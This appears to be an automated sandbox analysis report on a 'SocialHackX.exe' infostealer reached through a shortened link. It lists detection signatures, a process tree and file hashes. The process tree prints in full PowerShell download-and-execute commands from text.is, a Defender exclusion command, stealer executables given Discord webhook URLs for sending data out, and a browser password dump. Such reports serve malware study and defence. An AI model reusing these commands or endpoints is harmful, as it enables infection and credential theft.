Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/05/2024, 13:38

General

  • Target

    https://t.ly/ESpzU

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://text.is/QW7R/raw

Signatures

  • UAC bypass 3 TTPs 4 IoCs
  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 1 IoCs
  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Powershell Invoke Web Request.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 19 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 18 IoCs
  • Looks up external IP address via web service 9 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects Pyinstaller 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 3 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 43 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 41 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.ly/ESpzU
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4456
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffff99546f8,0x7ffff9954708,0x7ffff9954718
      2⤵
        PID:1696
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2
        2⤵
          PID:4036
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:468
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2508 /prefetch:8
          2⤵
            PID:4572
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
            2⤵
              PID:1468
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
              2⤵
                PID:3540
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:1
                2⤵
                  PID:2104
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3912 /prefetch:8
                  2⤵
                    PID:4812
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3912 /prefetch:8
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4996
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5356 /prefetch:8
                    2⤵
                      PID:2292
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
                      2⤵
                        PID:1208
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
                        2⤵
                          PID:4160
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1
                          2⤵
                            PID:3308
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2040 /prefetch:1
                            2⤵
                              PID:432
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
                              2⤵
                                PID:4644
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:1
                                2⤵
                                  PID:940
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5936 /prefetch:8
                                  2⤵
                                    PID:3400
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6368 /prefetch:8
                                    2⤵
                                      PID:3932
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6596 /prefetch:8
                                      2⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:644
                                    • C:\Users\Admin\Downloads\SocialHackX.exe
                                      "C:\Users\Admin\Downloads\SocialHackX.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      PID:4888
                                      • C:\Users\Admin\Downloads\SocialHackX.exe
                                        "C:\Users\Admin\Downloads\SocialHackX.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:4120
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "powershell.exe -ExecutionPolicy Bypass -Command "$url = 'https://text.is/QW7R/raw';$pasteid = 'somepowershell16';$filecontent = (Invoke-WebRequest -Uri $url).Content -replace '\$url\$',\"https://text.is/$pasteid/raw\";$vbsfile = [System.IO.Path]::GetTempPath()+'\aaa.vbs';Set-Content -Path $vbsfile -Value $filecontent;Start-Process -FilePath $vbsfile" "
                                          4⤵
                                            PID:5216
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell.exe -ExecutionPolicy Bypass -Command "$url = 'https://text.is/QW7R/raw';$pasteid = 'somepowershell16';$filecontent = (Invoke-WebRequest -Uri $url).Content -replace '\$url\$',\"https://text.is/$pasteid/raw\";$vbsfile = [System.IO.Path]::GetTempPath()+'\aaa.vbs';Set-Content -Path $vbsfile -Value $filecontent;Start-Process -FilePath $vbsfile"
                                              5⤵
                                              • Blocklisted process makes network request
                                              • Command and Scripting Interpreter: PowerShell
                                              • Modifies registry class
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5348
                                              • C:\Windows\System32\WScript.exe
                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aaa.vbs"
                                                6⤵
                                                • Checks computer location settings
                                                PID:5340
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionProcess powershell.exe, cscript.exe, wscript.exe"
                                                  7⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4948
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-RestMethod -Uri 'https://text.is/somepowershell16/raw' -Method GET | Invoke-Expression"
                                                  7⤵
                                                  • UAC bypass
                                                  • Blocklisted process makes network request
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2448
                                                  • C:\Users\Admin\AppData\Local\Updates.exe
                                                    "C:\Users\Admin\AppData\Local\Updates.exe"
                                                    8⤵
                                                    • Checks computer location settings
                                                    • Drops startup file
                                                    • Executes dropped EXE
                                                    • Adds Run key to start application
                                                    • Modifies registry class
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5268
                                                    • C:\Windows\SysWOW64\WScript.exe
                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\updates.vbs"
                                                      9⤵
                                                      • Checks computer location settings
                                                      • Adds Run key to start application
                                                      PID:6372
                                                      • C:\Users\Admin\AppData\Local\Updates.exe
                                                        "C:\Users\Admin\AppData\Local\Updates.exe"
                                                        10⤵
                                                        • Executes dropped EXE
                                                        PID:6500
                                                    • C:\Users\Admin\AppData\Local\Temp\ddtk.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\ddtk.exe" https://discord.com/api/webhooks/1237132477009629275/XiGmeoQt4As267lHfFGaPe9RDaJ9rTRpBxFG3B4oPbwUbGWh7cDVZwgjsSkbDI_44HOx
                                                      9⤵
                                                      • Executes dropped EXE
                                                      PID:5500
                                                      • C:\Users\Admin\AppData\Local\Temp\ddtk.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\ddtk.exe" https://discord.com/api/webhooks/1237132477009629275/XiGmeoQt4As267lHfFGaPe9RDaJ9rTRpBxFG3B4oPbwUbGWh7cDVZwgjsSkbDI_44HOx
                                                        10⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        PID:5692
                                                  • C:\Users\Admin\AppData\Local\Temp\hackx.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\hackx.exe"
                                                    8⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:6060
                                      • C:\Users\Admin\Downloads\SocialHackX.exe
                                        "C:\Users\Admin\Downloads\SocialHackX.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:4236
                                        • C:\Users\Admin\Downloads\SocialHackX.exe
                                          "C:\Users\Admin\Downloads\SocialHackX.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:4368
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "powershell.exe -ExecutionPolicy Bypass -Command "$url = 'https://text.is/QW7R/raw';$pasteid = 'somepowershell16';$filecontent = (Invoke-WebRequest -Uri $url).Content -replace '\$url\$',\"https://text.is/$pasteid/raw\";$vbsfile = [System.IO.Path]::GetTempPath()+'\aaa.vbs';Set-Content -Path $vbsfile -Value $filecontent;Start-Process -FilePath $vbsfile" "
                                            4⤵
                                              PID:4924
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell.exe -ExecutionPolicy Bypass -Command "$url = 'https://text.is/QW7R/raw';$pasteid = 'somepowershell16';$filecontent = (Invoke-WebRequest -Uri $url).Content -replace '\$url\$',\"https://text.is/$pasteid/raw\";$vbsfile = [System.IO.Path]::GetTempPath()+'\aaa.vbs';Set-Content -Path $vbsfile -Value $filecontent;Start-Process -FilePath $vbsfile"
                                                5⤵
                                                • Blocklisted process makes network request
                                                • Command and Scripting Interpreter: PowerShell
                                                • Modifies registry class
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:7156
                                                • C:\Windows\System32\WScript.exe
                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aaa.vbs"
                                                  6⤵
                                                  • Checks computer location settings
                                                  PID:6420
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionProcess powershell.exe, cscript.exe, wscript.exe"
                                                    7⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:6516
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-RestMethod -Uri 'https://text.is/somepowershell16/raw' -Method GET | Invoke-Expression"
                                                    7⤵
                                                    • UAC bypass
                                                    • Blocklisted process makes network request
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:6736
                                                    • C:\Users\Admin\AppData\Local\Updates.exe
                                                      "C:\Users\Admin\AppData\Local\Updates.exe"
                                                      8⤵
                                                      • Checks computer location settings
                                                      • Drops startup file
                                                      • Executes dropped EXE
                                                      • Adds Run key to start application
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:6980
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "cmd.exe" /C del /F /Q "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c21040.vbs"
                                                        9⤵
                                                          PID:7076
                                                        • C:\Users\Admin\AppData\Local\Temp\ddtk.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\ddtk.exe" https://discord.com/api/webhooks/1237132477009629275/XiGmeoQt4As267lHfFGaPe9RDaJ9rTRpBxFG3B4oPbwUbGWh7cDVZwgjsSkbDI_44HOx
                                                          9⤵
                                                          • Executes dropped EXE
                                                          PID:2932
                                                          • C:\Users\Admin\AppData\Local\Temp\ddtk.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\ddtk.exe" https://discord.com/api/webhooks/1237132477009629275/XiGmeoQt4As267lHfFGaPe9RDaJ9rTRpBxFG3B4oPbwUbGWh7cDVZwgjsSkbDI_44HOx
                                                            10⤵
                                                            • Executes dropped EXE
                                                            PID:4236
                                                        • C:\Users\Admin\AppData\Local\Temp\clipb.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\clipb.exe"
                                                          9⤵
                                                          • Executes dropped EXE
                                                          PID:2464
                                                        • C:\Users\Admin\AppData\Local\Temp\creeeed.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\creeeed.exe" https://discord.com/api/webhooks/1220089465893027911/P49OdhJVk9S1INA6ouznebhYG_Xy2KXwqbGe2a3BUCElHqQdm-L-KJPT_FZ01mFVqAQL
                                                          9⤵
                                                          • Checks computer location settings
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5340
                                                          • C:\Users\Admin\AppData\Local\Temp\webpass.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\webpass.exe" /stext GSAGMHCQ_pass.txt
                                                            10⤵
                                                            • Executes dropped EXE
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:6908
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 2392
                                                            10⤵
                                                            • Program crash
                                                            PID:6056
                                                        • C:\Users\Admin\AppData\Local\Temp\specsss.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\specsss.exe" https://discord.com/api/webhooks/1237132702486888610/N1fds46AH5XYfc2oEiGsaM_LJ4c9tw_GLIcNjfB7yHp7gqNOsjSnI_A3E0skJhUJwOZM
                                                          9⤵
                                                          • Executes dropped EXE
                                                          • Checks processor information in registry
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:6312
                                                        • C:\Users\Admin\AppData\Local\Temp\sstxt.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\sstxt.exe"
                                                          9⤵
                                                          • Executes dropped EXE
                                                          PID:6844
                                                          • C:\Users\Admin\AppData\Local\Temp\sstxt.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\sstxt.exe"
                                                            10⤵
                                                            • Executes dropped EXE
                                                            PID:6884
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell.exe -Command "Add-Type -AssemblyName presentationframework; [environment]::GetFolderPath([environment+specialfolder]::Desktop)"
                                                              11⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:6424
                                                      • C:\Users\Admin\AppData\Local\Temp\hackx.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\hackx.exe"
                                                        8⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:7004
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,3850368119936629081,6594616051107532984,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4460 /prefetch:2
                                            2⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:5272
                                        • C:\Windows\System32\CompPkgSrv.exe
                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                          1⤵
                                            PID:1788
                                          • C:\Windows\System32\CompPkgSrv.exe
                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                            1⤵
                                              PID:4676
                                            • C:\Windows\system32\AUDIODG.EXE
                                              C:\Windows\system32\AUDIODG.EXE 0x518 0x514
                                              1⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2848
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5340 -ip 5340
                                              1⤵
                                                PID:5976

                                              Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                      Filesize

                                                      152B

                                                      MD5

                                                      56641592f6e69f5f5fb06f2319384490

                                                      SHA1

                                                      6a86be42e2c6d26b7830ad9f4e2627995fd91069

                                                      SHA256

                                                      02d4984e590e947265474d592e64edde840fdca7eb881eebde3e220a1d883455

                                                      SHA512

                                                      c75e689b2bbbe07ebf72baf75c56f19c39f45d5593cf47535eb722f95002b3ee418027047c0ee8d63800f499038db5e2c24aff9705d830c7b6eaa290d9adc868

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                      Filesize

                                                      152B

                                                      MD5

                                                      612a6c4247ef652299b376221c984213

                                                      SHA1

                                                      d306f3b16bde39708aa862aee372345feb559750

                                                      SHA256

                                                      9d8e24c91cff338e56b518a533cb2e49a2803356bbf6e04892fb168a7ce2844a

                                                      SHA512

                                                      34a14d63abb1e3fe0f9927a94393043d458fe0624843e108d290266f554018e6379cba924cb5388735abdd6c5f1e2e318478a673f3f9b762815a758866d10973

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

                                                      Filesize

                                                      416KB

                                                      MD5

                                                      ab7664c07a040a3421723f4586ac32d9

                                                      SHA1

                                                      5199582fd2fba4630c3dc4c7b2dbb66539352eb7

                                                      SHA256

                                                      70b1cc6743c2884225ed04fd66e5dcd35cf60c481c595eb7149822a84c9683c4

                                                      SHA512

                                                      b754e832b03b85fb5bce9e41927d941d0d97f014977be4f16401bdb5b648a7a87b77a494092b60855265538bdaf878df226b711f296aa443b1b0443fb51e7995

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                      Filesize

                                                      120B

                                                      MD5

                                                      7e23b42769bc7aafe15811287cfdfc18

                                                      SHA1

                                                      967651f41800be457fa92528daa1f8e89ea040ce

                                                      SHA256

                                                      90ffcdc49ac60640daf4b7dcc06abc108625447160e24deba17d5525538dfa53

                                                      SHA512

                                                      c134d5fe6a6595c6446c745fc4375ccedc21da478b82a944df2dc8c39c691afb93b8d1d257fc576dd92d633094bceb8f32c2d6753fb2e703f6351ce3131f2592

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                      Filesize

                                                      998B

                                                      MD5

                                                      7486ab6953e1b025515421c4688a6d90

                                                      SHA1

                                                      a02b7868f9edf70ca9f0ec201a210deed8a75fea

                                                      SHA256

                                                      4f9155d703538edc429b6b3fe82df7f6a7e0c73407349985e1610fd6093a5cd4

                                                      SHA512

                                                      51c134a516fa07d6df8c93fa13b184e9a280fbc7d43cc3989e5035b7e58b9b6ddb3f0dc192cc2f600e495a6e12475c5bfe7f21c8ad61002070e7465fde6bee52

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                      Filesize

                                                      6KB

                                                      MD5

                                                      5f9d93a23baafcda9520aa0d049a044d

                                                      SHA1

                                                      4b1e21b87a94fef6d2f320d44db90c78cc5702b0

                                                      SHA256

                                                      0e1da361445d226a96c8f9122e0a4630dee7521e5628d6089fa1cc98834f467b

                                                      SHA512

                                                      b35a3f9bc6d39137e341adde9602d7e38cc9d845ab870aa26862706af1665e585dfdb63ef05d71d8c683e9df0c3b32c24c7bd2f349bacd716a8547e1a4e36d51

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                      Filesize

                                                      6KB

                                                      MD5

                                                      6325e3feb6dc9363e5216172ee1dc55c

                                                      SHA1

                                                      ecac7de596e0a3a012d736aef4ae6c2319310e1b

                                                      SHA256

                                                      ef08ee1b1c017cf72b7b91f3173a2ab42b74cd535668c022dc9431866869d988

                                                      SHA512

                                                      ee6b371bb73f7f9a0120e35b237e390b8857cf40f827910b52353aaa820c074c0c2ab9e944b333e087713c03450d0e05732866bc0f3a80e817da01e54f5136ac

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                      Filesize

                                                      16B

                                                      MD5

                                                      46295cac801e5d4857d09837238a6394

                                                      SHA1

                                                      44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                      SHA256

                                                      0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                      SHA512

                                                      8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                      Filesize

                                                      16B

                                                      MD5

                                                      206702161f94c5cd39fadd03f4014d98

                                                      SHA1

                                                      bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                      SHA256

                                                      1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                      SHA512

                                                      0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

